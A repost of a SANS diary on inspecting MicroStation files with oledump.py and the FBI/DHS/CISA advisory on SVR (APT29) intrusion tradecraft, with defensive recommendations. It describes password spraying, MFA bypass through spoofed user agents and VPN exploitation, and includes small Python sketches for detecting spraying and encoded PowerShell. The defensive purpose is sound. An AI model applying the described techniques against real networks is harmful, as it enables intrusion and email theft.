(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

CAD: .DGN and .MVBA Files, (Mon, Apr 26th)

This post was originally published on this site

I regularly receive questions about MicroStation files, ever since I wrote a diary entry about AutoCAD drawings containing VBA code.

MicroStation is CAD software, and it can run VBA code.

I've never been given malicious MicroStation files, but recently I was given a normal drawing (.dgn) and a script file (.mvba).

To be clear: these are not malware samples, the files were given to me so that I could take a look at the internal file format and report it.

Turns out that both files are "OLE files", and can thus be analyzed with my oledump.py tool.

Here is the .DGN file:

It's an OLE file with a storage (folder) named Dgn-Md containing other storages and streams.

And the metadata identifies this as a MicroStation file (I'm using tail to filter out the thumbnail data):

It does not contain VBA code: AFAIK, .DGN files cannot contain VBA code. Please post a comment if I'm wrong, or if you can share a sample .DGN file containing VBA code.

The VBA script file, with extension .MVBA, is also an OLE file with VBA code streams:

Here too, the M indicator alerts us to the presence of VBA code. It can be extracted with oledump:
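A typical invocation looks like this (the stream number is an assumption that depends on the sample):

oledump.py sample.mvba
oledump.py -s 3 -v sample.mvba

The -s option selects the stream to dump, and -v decompresses the VBA source code it contains.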

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AA21-116A: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders

This post was originally published on this site

Original release date: April 26, 2021

Summary

The Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium—will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled “Russian SVR Targets U.S. and Allied Networks,” released on April 15, 2021.

The FBI and DHS are providing information on the SVR’s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.

Click here for a PDF version of this report.

Threat Overview

SVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors’ ability to move within victim environments undetected.

Beginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.

Technical Details

SVR Cyber Operations Tactics, Techniques, and Procedures

Password Spraying

In one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a “low and slow” manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.

The organization unintentionally exempted the compromised administrator’s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.

The actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple’s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.

While the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.

During the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. 
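This "low and slow" pattern is hard to spot per account, but it stands out when failed logins are aggregated across accounts. A rough detection sketch over generic authentication logs (the event format and threshold are illustrative assumptions):

from collections import defaultdict

def find_spray_candidates(events, min_accounts=10):
    # events: iterable of (timestamp, source_ip, username, success) tuples
    accounts_per_ip = defaultdict(set)
    for ts, ip, user, success in events:
        if not success:
            accounts_per_ip[ip].add(user)
    # one source failing against many distinct accounts suggests spraying;
    # for sprays spread across many IPs, aggregate by ASN, user agent, or time window instead
    return {ip: users for ip, users in accounts_per_ip.items() if len(users) >= min_accounts}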

Recommendations

To defend against this technique, the FBI and DHS recommend that network operators follow best practices for configuring access to cloud computing environments, including:

  • Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations.
  • Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.
  • Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.
  • Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.
  • Regularly review the organization’s password management program.
  • Ensure the organization’s information technology (IT) support team has well-documented standard operating procedures for password resets and user account lockouts.
  • Maintain a regular cadence of security awareness training for all company employees.

Leveraging Zero-Day Vulnerability

In a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.

The actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.

Following initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.

Recommendations

To defend against this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:

  • Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP (a short detection sketch follows this list).
  • Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
  • Require use of multi-factor authentication to access internal systems.
  • Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate into enterprise monitoring tools.
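Encoded PowerShell, referenced in the first bullet above, can be surfaced from process-creation logs with a few lines of code. A rough sketch (the regular expression and decoding heuristic are illustrative assumptions):

import base64
import re

ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

def decode_encoded_powershell(command_line):
    # return the decoded script if the command line carries an -EncodedCommand argument
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        # PowerShell expects the script as base64-encoded UTF-16LE
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None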

WELLMESS Malware

In 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI’s investigation revealed that following initial compromise of a network—normally through an unpatched, publicly-known vulnerability—the actors deployed WELLMESS. Once on the network, the actors targeted each organization’s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion has been previously released and is referenced in the ‘Resources’ section of this document.

Tradecraft Similarities of SolarWinds-enabled Intrusions

During the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR’s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR’s historic tradecraft.

The FBI’s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.

Recommendations

Although defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:

  • Auditing log files to identify attempts to access privileged certificates and creation of fake identity providers.
  • Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.
  • Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
  • Using available public resources to identify credential abuse within cloud environments.
  • Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.

While few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly “zero trust” architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.

General Tradecraft Observations

SVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.

The FBI also notes SVR cyber operators have continuously used open source or commercially available tools, including Mimikatz—an open source credential-dumping tool—and Cobalt Strike—a commercially available exploitation tool.

Mitigations

The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.

Resources

Revisions

  • April 26, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.